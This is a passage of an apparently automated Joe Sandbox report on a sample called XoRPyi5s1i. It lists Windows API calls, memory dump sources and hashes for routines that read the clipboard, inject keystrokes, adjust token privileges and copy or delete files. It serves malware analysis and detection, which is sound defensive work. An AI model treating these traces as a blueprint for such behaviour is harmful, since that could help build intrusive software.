                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: f00c1d4b191ee12458134eaac0404e344abc2aaa917ef2e0a03ef8350f04b932
                                    • Instruction ID: 3fa8bb246b75a6a7a7a50c541d712172acf2ed375ac57797ee3239e00f2df97e
                                    • Opcode Fuzzy Hash: f00c1d4b191ee12458134eaac0404e344abc2aaa917ef2e0a03ef8350f04b932
                                    • Instruction Fuzzy Hash: 97F0A932A00205EADF22AFB48C0239F3AA1AF12322F158415FC309F191C7788A5ADB81
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,001339FE,?,00000001), ref: 00134286
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: f4962c63aa7c8bf29b347c70a76987b73a9b0afd85394800752450b7e26ca468
                                    • Instruction ID: 366454ccb3a6955e1450d2341afe65baac210f3c3d7d9e12fb8fe71d35690dc7
                                    • Opcode Fuzzy Hash: f4962c63aa7c8bf29b347c70a76987b73a9b0afd85394800752450b7e26ca468
                                    • Instruction Fuzzy Hash: 2FF03971505702CFCB38DF64E890817BBE4BF143257258A7EF5D6A2621C772A884DF50
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001340C6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 552d947d391b0541b5ec075da019744298a62037130cd155feae7a74dfbfa9cd
                                    • Instruction ID: 3f439887e89cbd0ee7aeb03035d2490941ae0a6bec2d0e4820b7b58fc272ae6d
                                    • Opcode Fuzzy Hash: 552d947d391b0541b5ec075da019744298a62037130cd155feae7a74dfbfa9cd
                                    • Instruction Fuzzy Hash: 89E0C2366002246BC711A658DC46FEA77ADDFC86A0F0941B5F909E7244EBA4ADC18690
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction ID: 550718c503f80276fe23f0ed905f0b775d60e40ec0f4b4227f6cf4e29e0e2b55
                                    • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction Fuzzy Hash: 7CE0D8B0108B009FD7388B24D840BE373E0EB05319F00091CF6ABC3241EB637841C759
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 0177B7FB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction ID: 3f16f1e48846c8f4c01882aa55573353a35fbbe0fe45b958290baa999feacf26
                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction Fuzzy Hash: DEE0C230A4620CEFDF20CFBCCC08AADB3A8DB44320F008B98E916CB2C0D5308A409B94
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,001A40EA,00000000,00000000,00000000), ref: 001347A9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: bf36fc1ff12ed597c7568056104750b6b0096dded3b9b7b0e9b3f0d8fa0f32ba
                                    • Instruction ID: 9bb843e7a5ad10b6bf9e919c05dcc5a702bb4659eba0cae138981f95a20c9c6c
                                    • Opcode Fuzzy Hash: bf36fc1ff12ed597c7568056104750b6b0096dded3b9b7b0e9b3f0d8fa0f32ba
                                    • Instruction Fuzzy Hash: A5D0C974640208BFEB04CB94DC46F9A7BBCEB04718F200194F600AA2D0E2F2BE808B55
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 0177B7CB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction ID: e35c750b13e7bd138f88de53f669d6a33a688adb6cbb4f598cb3941f4be3ed5a
                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction Fuzzy Hash: B7D0A73090520CEBCF10CFF89C089DAF3A8DB04361F004755FD15C3280D53199509790
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 0177D211
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: 2f49b4768fd5312ce58a4edbffbdf84a6de5f59395ad3ee6bf8b3e2b1b5cc797
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: 75E09A7494410DAFDB10EFA4D54969E7BB4EF04311F1005A1FD0596691DA309A549A62
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 0177D211
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 0a6bf52f4c7bb3a968997f987751abc6ff34f79211fd228647c12a443aa6c6f2
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: A4E0E67494410DDFDB00EFF4D54969E7FB4EF04301F100161FD01D2281D6309D509A62
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0019F87D
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0019F8DC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0019F919
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0019F940
                                    • SendMessageW.USER32 ref: 0019F966
                                    • _wcsncpy.LIBCMT ref: 0019F9D2
                                    • GetKeyState.USER32(00000011), ref: 0019F9F3
                                    • GetKeyState.USER32(00000009), ref: 0019FA00
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0019FA16
                                    • GetKeyState.USER32(00000010), ref: 0019FA20
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0019FA4F
                                    • SendMessageW.USER32 ref: 0019FA72
                                    • SendMessageW.USER32(?,00001030,?,0019E059), ref: 0019FB6F
                                    • SetCapture.USER32(?), ref: 0019FB9F
                                    • ClientToScreen.USER32(?,?), ref: 0019FC03
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0019FC29
                                    • ReleaseCapture.USER32 ref: 0019FC34
                                    • GetCursorPos.USER32(?), ref: 0019FC69
                                    • ScreenToClient.USER32(?,?), ref: 0019FC76
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0019FCD8
                                    • SendMessageW.USER32 ref: 0019FD02
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0019FD41
                                    • SendMessageW.USER32 ref: 0019FD6C
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0019FD84
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0019FD8F
                                    • GetCursorPos.USER32(?), ref: 0019FDB0
                                    • ScreenToClient.USER32(?,?), ref: 0019FDBD
                                    • GetParent.USER32(?), ref: 0019FDD9
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0019FE3F
                                    • SendMessageW.USER32 ref: 0019FE6F
                                    • ClientToScreen.USER32(?,?), ref: 0019FEC5
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0019FEF1
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0019FF19
                                    • SendMessageW.USER32 ref: 0019FF3C
                                    • ClientToScreen.USER32(?,?), ref: 0019FF86
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0019FFB6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 001A004B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3461372671-4164748364
                                    • Opcode ID: ee04cce472146aa96556efedea1a33040e4daa632b7abdd73102358a343f7263
                                    • Instruction ID: f72b33a2cd761628be337a4fa8a12bd28e3d6753471fe21f0a93e681f174860d
                                    • Opcode Fuzzy Hash: ee04cce472146aa96556efedea1a33040e4daa632b7abdd73102358a343f7263
                                    • Instruction Fuzzy Hash: 3B32CA74604245EFDB24CF28C884BAABBA9FF49354F140A2DF695C72A0D770EC92CB51
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0019B1CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: cfb6707079bfa9b898c4395ced026f9e16b1aa94348b067e5b7f910434721ce2
                                    • Instruction ID: 88ec927c54fe1fadd4fcce4b68361a5c0d88396caaefb8bb1aabf16b3443ad81
                                    • Opcode Fuzzy Hash: cfb6707079bfa9b898c4395ced026f9e16b1aa94348b067e5b7f910434721ce2
                                    • Instruction Fuzzy Hash: EF12CE71504208ABEF299F64ED89FAE7BB8FF85310F144229F916DB2D0EB708945CB51
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0014EB4A
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001A3AEA
                                    • IsIconic.USER32(000000FF), ref: 001A3AF3
                                    • ShowWindow.USER32(000000FF,00000009), ref: 001A3B00
                                    • SetForegroundWindow.USER32(000000FF), ref: 001A3B0A
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001A3B20
                                    • GetCurrentThreadId.KERNEL32 ref: 001A3B27
                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 001A3B33
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001A3B44
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001A3B4C
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 001A3B54
                                    • SetForegroundWindow.USER32(000000FF), ref: 001A3B57
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B6C
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3B77
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B81
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3B86
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B8F
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3B94
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B9E
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3BA3
                                    • SetForegroundWindow.USER32(000000FF), ref: 001A3BA6
                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 001A3BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 7d5d2a6c39cfad9029bbb0eb2b951773add2db99f731b5e18ee4ae902ae0b52a
                                    • Instruction ID: 365da6622f28a4717a2cdfaac45b6f74e31560134dd518ca2d373e15cf6739ad
                                    • Opcode Fuzzy Hash: 7d5d2a6c39cfad9029bbb0eb2b951773add2db99f731b5e18ee4ae902ae0b52a
                                    • Instruction Fuzzy Hash: 6F31D475A403187BEB341B659C49F7F3E6DEB44B50F114125FA04EA1D0EBB05D40AEB0
                                    APIs
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00175FA6,?), ref: 00176ED8
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00175FA6,?), ref: 00176EF1
                                      • Part of subcall function 0017725E: __wsplitpath.LIBCMT ref: 0017727B
                                      • Part of subcall function 0017725E: __wsplitpath.LIBCMT ref: 0017728E
                                      • Part of subcall function 001772CB: GetFileAttributesW.KERNEL32(?,00176019), ref: 001772CC
                                    • _wcscat.LIBCMT ref: 00176149
                                    • _wcscat.LIBCMT ref: 00176167
                                    • __wsplitpath.LIBCMT ref: 0017618E
                                    • FindFirstFileW.KERNEL32(?,?), ref: 001761A4
                                    • _wcscpy.LIBCMT ref: 00176209
                                    • _wcscat.LIBCMT ref: 0017621C
                                    • _wcscat.LIBCMT ref: 0017622F
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0017625D
                                    • DeleteFileW.KERNEL32(?), ref: 0017626E
                                    • MoveFileW.KERNEL32(?,?), ref: 00176289
                                    • MoveFileW.KERNEL32(?,?), ref: 00176298
                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 001762AD
                                    • DeleteFileW.KERNEL32(?), ref: 001762BE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001762E1
                                    • FindClose.KERNEL32(00000000), ref: 001762FD
                                    • FindClose.KERNEL32(00000000), ref: 0017630B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                    • String ID: \*.*$p1Wu`KXu
                                    • API String ID: 1917200108-2866000061
                                    • Opcode ID: cda14fc28f1a0963d0da08c95f48f868672386f7574e346cbde0262c4bcfd18c
                                    • Instruction ID: bbdc7dcace41ac06d9b37d6cbc8fe92a3106f345f5d4e429b3632a6d094531c5
                                    • Opcode Fuzzy Hash: cda14fc28f1a0963d0da08c95f48f868672386f7574e346cbde0262c4bcfd18c
                                    • Instruction Fuzzy Hash: 5751207280811CAACB25EB91DC44DEF77BCAF15300F0541EAE599E3142EF3697898FA4
                                    APIs
                                      • Part of subcall function 0016B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
                                      • Part of subcall function 0016B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
                                      • Part of subcall function 0016B134: GetLastError.KERNEL32 ref: 0016B1BA
                                    • _memset.LIBCMT ref: 0016AD08
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0016AD5A
                                    • CloseHandle.KERNEL32(?), ref: 0016AD6B
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0016AD82
                                    • GetProcessWindowStation.USER32 ref: 0016AD9B
                                    • SetProcessWindowStation.USER32(00000000), ref: 0016ADA5
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0016ADBF
                                      • Part of subcall function 0016AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0016ACC0), ref: 0016AB99
                                      • Part of subcall function 0016AB84: CloseHandle.KERNEL32(?,?,0016ACC0), ref: 0016ABAB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0$winsta0\default
                                    • API String ID: 2063423040-1685893292
                                    • Opcode ID: dea87b05fafedcbff9f6f69f2ad3eef70b6e7e615e5df00d734d9e46f22dd4fe
                                    • Instruction ID: 629ef6c7074d6477bacf6ef1f1cf9394b8eebba215697812b3cd1e682a9da253
                                    • Opcode Fuzzy Hash: dea87b05fafedcbff9f6f69f2ad3eef70b6e7e615e5df00d734d9e46f22dd4fe
                                    • Instruction Fuzzy Hash: 70819EB1800209AFDF159FA4DC45AEE7B78FF18304F448159F814B6561EB328EA5DF62
                                    APIs
                                    • OpenClipboard.USER32(001CDC00), ref: 00186B36
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00186B44
                                    • GetClipboardData.USER32(0000000D), ref: 00186B4C
                                    • CloseClipboard.USER32 ref: 00186B58
                                    • GlobalLock.KERNEL32(00000000), ref: 00186B74
                                    • CloseClipboard.USER32 ref: 00186B7E
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00186B93
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00186BA0
                                    • GetClipboardData.USER32(00000001), ref: 00186BA8
                                    • GlobalLock.KERNEL32(00000000), ref: 00186BB5
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00186BE9
                                    • CloseClipboard.USER32 ref: 00186CF6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                    • String ID:
                                    • API String ID: 3222323430-0
                                    • Opcode ID: e7972457f5cd364e1e07d525749219d7d82530c48948c7835957337dbfaa744b
                                    • Instruction ID: 893977d32e1ddc3fc12362fc943cd79655924251215d734a873e2007ba2fddc0
                                    • Opcode Fuzzy Hash: e7972457f5cd364e1e07d525749219d7d82530c48948c7835957337dbfaa744b
                                    • Instruction Fuzzy Hash: 8E519E71200201ABD308BF64ED86F6E77A8AF98B10F004129F596D61E1EF70DA45CF62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0017F62B
                                    • FindClose.KERNEL32(00000000), ref: 0017F67F
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0017F6A4
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0017F6BB
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0017F6E2
                                    • __swprintf.LIBCMT ref: 0017F72E
                                    • __swprintf.LIBCMT ref: 0017F767
                                    • __swprintf.LIBCMT ref: 0017F7BB
                                      • Part of subcall function 0015172B: __woutput_l.LIBCMT ref: 00151784
                                    • __swprintf.LIBCMT ref: 0017F809
                                    • __swprintf.LIBCMT ref: 0017F858
                                    • __swprintf.LIBCMT ref: 0017F8A7
                                    • __swprintf.LIBCMT ref: 0017F8F6
